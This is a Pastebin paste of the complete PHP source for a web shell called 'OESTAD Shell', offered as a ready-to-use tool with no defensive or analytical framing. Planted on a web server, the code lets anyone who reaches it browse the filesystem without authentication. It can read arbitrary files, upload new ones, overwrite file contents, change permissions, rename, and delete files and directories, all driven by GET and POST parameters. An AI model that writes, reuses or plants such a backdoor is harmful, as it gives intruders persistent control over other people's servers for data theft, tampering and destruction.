SHARE
TWEET

Untitled

a guest Apr 18th, 2019 68 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. if(get_magic_quotes_gpc()){
  6. foreach($_POST as $key=>$value){
  7. $_POST[$key] = stripslashes($value);
  8. }
  9. }
  10. echo '<!DOCTYPE HTML>
  11. <HTML>
  12. <HEAD>
  13. <link href="" rel="stylesheet" type="text/css">
  14. <title>OESTAD Shell</title><link rel="SHORTCUT ICON"  href="http://i.imgur.com/QYUFm5u.png">
  15. <style>
  16. body{
  17. font-family: "Courier", cursive;
  18. color: #fff;
  19. background-color: #000;
  20. text-shadow:0px 0px 1px #757575;
  21. }
  22. #content tr:hover{
  23. background-color: #000;
  24. text-shadow:0px 0px 10px #fff;
  25. }
  26. #content .first{
  27. background-color: red;
  28. }
  29. #content .first:hover{
  30. background-color: red;
  31. text-shadow:0px 0px 1px #757575;
  32. }
  33. H1{
  34. font-family: "Courier", cursive;
  35. color: #fff;
  36. }
  37. a{
  38. color: #fff;
  39. text-decoration: none;
  40. }
  41. a:hover{
  42. color: #fff;
  43. text-shadow:0px 0px 5px #ffffff;
  44. }
  45. input,select,textarea{
  46. border: 1px #fff solid;
  47. -moz-border-radius: 5px;
  48. -webkit-border-radius:5px;
  49. border-radius:5px;
  50. }
  51. </style>
  52. </HEAD>
  53. <BODY>
  54. <H1><center>[!] OESTAD Shell [!] </center></H1>
  55. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  56. <tr><td>Current Path : ';
  57. if(isset($_GET['path'])){
  58. $path = $_GET['path'];
  59. }else{
  60. $path = getcwd();
  61. }
  62. $path = str_replace('\\','/',$path);
  63. $paths = explode('/',$path);
  64.  
  65. foreach($paths as $id=>$pat){
  66. if($pat == '' && $id == 0){
  67. $a = true;
  68. echo '<a href="?path=/">/</a>';
  69. continue;
  70. }
  71. if($pat == '') continue;
  72. echo '<a href="?path=';
  73. for($i=0;$i<=$id;$i++){
  74. echo "$paths[$i]";
  75. if($i != $id) echo "/";
  76. }
  77. echo '">'.$pat.'</a>/';
  78. }
  79. echo '</td></tr><tr><td>';
  80. if(isset($_FILES['file'])){
  81. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  82. echo '<font color="green">Upload File Success!</font><br />';
  83. }else{
  84. echo '<font color="red">Failed for Upload File!</font><br />';
  85. }
  86. }
  87. echo '<form enctype="multipart/form-data" method="POST">
  88. Upload File : <input type="file" name="file" />
  89. <input type="submit" value="upload" />
  90. </form>
  91. </td></tr>';
  92. if(isset($_GET['filesrc'])){
  93. echo "<tr><td>Current File : ";
  94. echo $_GET['filesrc'];
  95. echo '</tr></td></table><br />';
  96. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  97. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  98. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  99. if($_POST['opt'] == 'chmod'){
  100. if(isset($_POST['perm'])){
  101. if(chmod($_POST['path'],$_POST['perm'])){
  102. echo '<font color="green">Change Permission Success~!</font><br />';
  103. }else{
  104. echo '<font color="red">Failed for Change Permission !</font><br />';
  105. }
  106. }
  107. echo '<form method="POST">
  108. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  109. <input type="hidden" name="path" value="'.$_POST['path'].'">
  110. <input type="hidden" name="opt" value="chmod">
  111. <input type="submit" value="Go" />
  112. </form>';
  113. }elseif($_POST['opt'] == 'rename'){
  114. if(isset($_POST['newname'])){
  115. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  116. echo '<font color="green">Change Name Success!</font><br />';
  117. }else{
  118. echo '<font color="red">Failed for Change Name !</font><br />';
  119. }
  120. $_POST['name'] = $_POST['newname'];
  121. }
  122. echo '<form method="POST">
  123. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  124. <input type="hidden" name="path" value="'.$_POST['path'].'">
  125. <input type="hidden" name="opt" value="rename">
  126. <input type="submit" value="Go" />
  127. </form>';
  128. }elseif($_POST['opt'] == 'edit'){
  129. if(isset($_POST['src'])){
  130. $fp = fopen($_POST['path'],'w');
  131. if(fwrite($fp,$_POST['src'])){
  132. echo '<font color="green">Edit File Success!</font><br />';
  133. }else{
  134. echo '<font color="red">Failed for Edit File!</font><br />';
  135. }
  136. fclose($fp);
  137. }
  138. echo '<form method="POST">
  139. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  140. <input type="hidden" name="path" value="'.$_POST['path'].'">
  141. <input type="hidden" name="opt" value="edit">
  142. <input type="submit" value="Go" />
  143. </form>';
  144. }
  145. echo '</center>';
  146. }else{
  147. echo '</table><br /><center>';
  148. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  149. if($_POST['type'] == 'dir'){
  150. if(rmdir($_POST['path'])){
  151. echo '<font color="green">Delete Dir Success!</font><br />';
  152. }else{
  153. echo '<font color="red">Failed for Delete Dir!</font><br />';
  154. }
  155. }elseif($_POST['type'] == 'file'){
  156. if(unlink($_POST['path'])){
  157. echo '<font color="green">Delete File Success!</font><br />';
  158. }else{
  159. echo '<font color="red">Failed for Edit File!</font><br />';
  160. }
  161. }
  162. }
  163. echo '</center>';
  164. $scandir = scandir($path);
  165. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  166. <tr class="first">
  167. <td><center>Name</center></td>
  168. <td><center>Size</center></td>
  169. <td><center>Permissions</center></td>
  170. <td><center>Options</center></td>
  171. </tr>';
  172.  
  173. foreach($scandir as $dir){
  174. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  175. echo "<tr>
  176. <td><a href=\"?path=$path/$dir\">$dir</a></td>
  177. <td><center>--</center></td>
  178. <td><center>";
  179. if(is_writable("$path/$dir")) echo '<font color="green">';
  180. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  181. echo perms("$path/$dir");
  182. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  183.  
  184. echo "</center></td>
  185. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  186. <select name=\"opt\">
  187. <option value=\"\"></option>
  188. <option value=\"delete\">Delete</option>
  189. <option value=\"chmod\">Chmod</option>
  190. <option value=\"rename\">Rename</option>
  191. </select>
  192. <input type=\"hidden\" name=\"type\" value=\"dir\">
  193. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  194. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  195. <input type=\"submit\" value=\">\" />
  196. </form></center></td>
  197. </tr>";
  198. }
  199. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  200. foreach($scandir as $file){
  201. if(!is_file("$path/$file")) continue;
  202. $size = filesize("$path/$file")/1024;
  203. $size = round($size,3);
  204. if($size >= 1024){
  205. $size = round($size/1024,2).' MB';
  206. }else{
  207. $size = $size.' KB';
  208. }
  209.  
  210. echo "<tr>
  211. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  212. <td><center>".$size."</center></td>
  213. <td><center>";
  214. if(is_writable("$path/$file")) echo '<font color="green">';
  215. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  216. echo perms("$path/$file");
  217. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  218. echo "</center></td>
  219. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  220. <select name=\"opt\">
  221. <option value=\"\"></option>
  222. <option value=\"delete\">Delete</option>
  223. <option value=\"chmod\">Chmod</option>
  224. <option value=\"rename\">Rename</option>
  225. <option value=\"edit\">Edit</option>
  226. </select>
  227. <input type=\"hidden\" name=\"type\" value=\"file\">
  228. <input type=\"hidden\" name=\"name\" value=\"$file\">
  229. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  230. <input type=\"submit\" value=\">\" />
  231. </form></center></td>
  232. </tr>";
  233. }
  234. echo '</table>
  235. </div>';
  236. }
  237. echo '<br /><font color="red"></font><font color="red">Recode by Zer0xID - CyberTeamrox</font>
  238. </BODY>
  239. </HTML>';
  240. function perms($file){
  241. $perms = fileperms($file);
  242.  
  243. if (($perms & 0xC000) == 0xC000) {
  244. // Socket
  245. $info = 's';
  246. } elseif (($perms & 0xA000) == 0xA000) {
  247. // Symbolic Link
  248. $info = 'l';
  249. } elseif (($perms & 0x8000) == 0x8000) {
  250. // Regular
  251. $info = '-';
  252. } elseif (($perms & 0x6000) == 0x6000) {
  253. // Block special
  254. $info = 'b';
  255. } elseif (($perms & 0x4000) == 0x4000) {
  256. // Directory
  257. $info = 'd';
  258. } elseif (($perms & 0x2000) == 0x2000) {
  259. // Character special
  260. $info = 'c';
  261. } elseif (($perms & 0x1000) == 0x1000) {
  262. // FIFO pipe
  263. $info = 'p';
  264. } else {
  265. // Unknown
  266. $info = 'u';
  267. }
  268.  
  269. // Owner
  270. $info .= (($perms & 0x0100) ? 'r' : '-');
  271. $info .= (($perms & 0x0080) ? 'w' : '-');
  272. $info .= (($perms & 0x0040) ?
  273. (($perms & 0x0800) ? 's' : 'x' ) :
  274. (($perms & 0x0800) ? 'S' : '-'));
  275.  
  276. // Group
  277. $info .= (($perms & 0x0020) ? 'r' : '-');
  278. $info .= (($perms & 0x0010) ? 'w' : '-');
  279. $info .= (($perms & 0x0008) ?
  280. (($perms & 0x0400) ? 's' : 'x' ) :
  281. (($perms & 0x0400) ? 'S' : '-'));
  282.  
  283. // World
  284. $info .= (($perms & 0x0004) ? 'r' : '-');
  285. $info .= (($perms & 0x0002) ? 'w' : '-');
  286. $info .= (($perms & 0x0001) ?
  287. (($perms & 0x0200) ? 't' : 'x' ) :
  288. (($perms & 0x0200) ? 'T' : '-'));
  289.  
  290. return $info;
  291. }
  292. ?>
  293. <style type='text/css'>body,a:hover{cursor:url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur),progress!important;}</style>
  294.  
  295.  
  296.  
  297.  
  298.  
  299. Recode by OESTAD
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top